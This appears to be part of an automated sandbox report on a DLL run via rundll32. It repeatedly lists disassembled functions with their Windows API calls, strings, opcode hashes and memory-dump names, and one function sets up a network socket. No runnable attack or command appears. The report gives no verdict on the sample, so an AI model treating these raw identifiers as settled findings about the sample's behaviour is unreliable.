                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                                            • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                                            • API String ID: 4222005279-2156106531
                                                                                                                                                            • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                                            • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                                                            • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                                            • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                                            • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                                            • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                                            • __lock.LIBCMT ref: 10035229
                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                            • API String ID: 1036688887-2843748187
                                                                                                                                                            • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                                            • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                                                            • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                                            • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                                            • String ID: MS Shell Dlg
                                                                                                                                                            • API String ID: 1736106359-76309092
                                                                                                                                                            • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                                            • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                                                            • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                                            • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                                            • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                                            • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                            • String ID: System
                                                                                                                                                            • API String ID: 46613423-3470857405
                                                                                                                                                            • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                                            • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                                                            • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                                            • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                                            • _memset.LIBCMT ref: 10020AE2
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1891723912-0
                                                                                                                                                            • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                                            • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                                                            • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                                            • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                                              • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                                              • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 317715441-0
                                                                                                                                                            • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                                            • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                                                            • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                                            • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                                              • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                                                              • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                                              • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 168474834-0
                                                                                                                                                            • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                                            • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                                                            • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                                            • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                                            • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1151147025-0
                                                                                                                                                            • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                                            • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                                                            • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                                            • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                                            • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                                            • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2841959276-0
                                                                                                                                                            • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                                            • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                                                            • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                                            • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                                            • _memset.LIBCMT ref: 10029DA5
                                                                                                                                                              • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                                              • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                                              • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                                              • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2905758408-0
                                                                                                                                                            • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                                            • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                                                            • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                                            • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3574576181-0
                                                                                                                                                            • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                                            • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                                                            • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                                            • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
